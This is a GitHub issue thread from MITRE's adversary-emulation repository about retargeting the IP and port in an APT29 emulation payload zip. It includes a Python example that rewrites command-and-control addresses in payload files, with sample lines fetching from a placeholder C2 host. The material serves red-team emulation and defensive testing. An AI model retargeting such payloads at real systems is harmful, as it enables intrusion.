mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0

Day 1: CALDERA .zip Payload #17

Closed leegengyu closed 3 years ago

leegengyu commented 3 years ago

Hello,

For Day 1.A of APT29 executed using the CALDERA plugin, phase 7 uses the Modified-SysInternalsSuite.zip payload.

This zip file consists of the following:

  1. accesschk.exe
  2. hostui.txt
  3. javamtsup.exe
  4. psversion.txt
  5. readme.txt

While it is mentioned in a section in the README that the Python script "dynamically updates the payloads to the appropriate IP and port" (which it does in effect), it does not update the payloads in the said zip file to my understanding.

To this end, I would like to clarify whether we are required to manually update the appropriate IP and port in each of the 5 files above (where required), zip them when done, and then place the archive back into the plugins/evals/payloads directory. Is this because the Python script only covers .ps1 and .txt files?

Thank you!

jstroud-mitre commented 3 years ago

> To this end, I would like to clarify whether we are required to manually update the appropriate IP and port in each of the 5 files above (where required), zip them when done, and then place the archive back into the plugins/evals/payloads directory. Is this because the Python script only covers .ps1 and .txt files?

@leegengyu you're absolutely correct! If you want to update the .exe files you'll have to re-generate them, and I suggest checking out the evals steps for day-1 and day-2 here for further insights into how the payloads were used, so you have an idea of what you'll have to update.
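The manual step discussed above (rewrite the IP and port inside the zipped text payloads, repackage the archive, and treat the .exe members separately) can be scripted. The block below is an added example written for this page; it is not the attack-arsenal repository's own update script and makes no claim about how that script works. It assumes the member names listed in the issue, uses constructed placeholder contents and documentation-range addresses (192.0.2.10:8888 and 198.51.100.7:443), and only touches .ps1 and .txt members. Binary members are copied byte-for-byte and reported, and a second check scans every member for the old address so an operator can see which binaries still embed it and therefore need to be regenerated rather than patched.

```python
import io
import zipfile

# Member suffixes that are safe to rewrite as text. Assumption for this
# example: matches the .ps1/.txt coverage described in the issue.
TEXT_SUFFIXES = (".txt", ".ps1")


def build_sample_zip(old_addr: str) -> bytes:
    """Constructed stand-in for Modified-SysInternalsSuite.zip (not the real payload).

    The two .exe members are fake MZ stubs; accesschk.exe deliberately embeds
    the old address to show that a binary can still point at the old C2.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("accesschk.exe", b"MZ\x90\x00" + old_addr.encode("ascii"))
        z.writestr("hostui.txt", f"$server = 'http://{old_addr}'\n")
        z.writestr("javamtsup.exe", b"MZ\x90\x00fake-binary")
        z.writestr("psversion.txt", f"Invoke-WebRequest http://{old_addr}/ps\n")
        z.writestr("readme.txt", "constructed placeholder text\n")
    return buf.getvalue()


def retarget_zip(zip_bytes: bytes, old_addr: str, new_addr: str):
    """Return (new_zip_bytes, untouched_members).

    Every text member has old_addr replaced by new_addr. Any other member
    (e.g. .exe) is copied unchanged and its name is returned so the operator
    knows it must be regenerated instead of patched.
    """
    untouched = []
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info)
            if info.filename.lower().endswith(TEXT_SUFFIXES):
                # Strict UTF-8: a member that does not decode is not a text
                # payload and should fail loudly rather than be corrupted.
                text = data.decode("utf-8")
                data = text.replace(old_addr, new_addr).encode("utf-8")
            else:
                untouched.append(info.filename)
            # Passing the ZipInfo keeps the original timestamp and attributes;
            # size and CRC are recomputed by writestr.
            dst.writestr(info, data)
    return out.getvalue(), untouched


def members_still_referencing(zip_bytes: bytes, addr: str):
    """Names of members whose raw bytes still contain addr (text or binary)."""
    needle = addr.encode("ascii")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return [i.filename for i in z.infolist() if needle in z.read(i)]


def read_member(zip_bytes: bytes, name: str) -> bytes:
    """Helper so callers can inspect one member of an in-memory archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return z.read(name)


def member_names(zip_bytes: bytes):
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return z.namelist()


if __name__ == "__main__":
    OLD, NEW = "192.0.2.10:8888", "198.51.100.7:443"   # constructed addresses
    original = build_sample_zip(OLD)
    updated, binaries = retarget_zip(original, OLD, NEW)
    print("rewrote text members; untouched binaries:", binaries)
    print("members still embedding the old address:",
          members_still_referencing(updated, OLD))
    # Replace plugins/evals/payloads/Modified-SysInternalsSuite.zip with
    # `updated` only after the reported binaries have been regenerated.
```

The point of the second check is that a byte scan catches an address baked into a compiled payload even though no text rewrite can fix it; in the constructed sample, accesschk.exe is flagged while both text members come back clean.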

leegengyu commented 3 years ago

Thank you for the clarification @jstroud-mitre !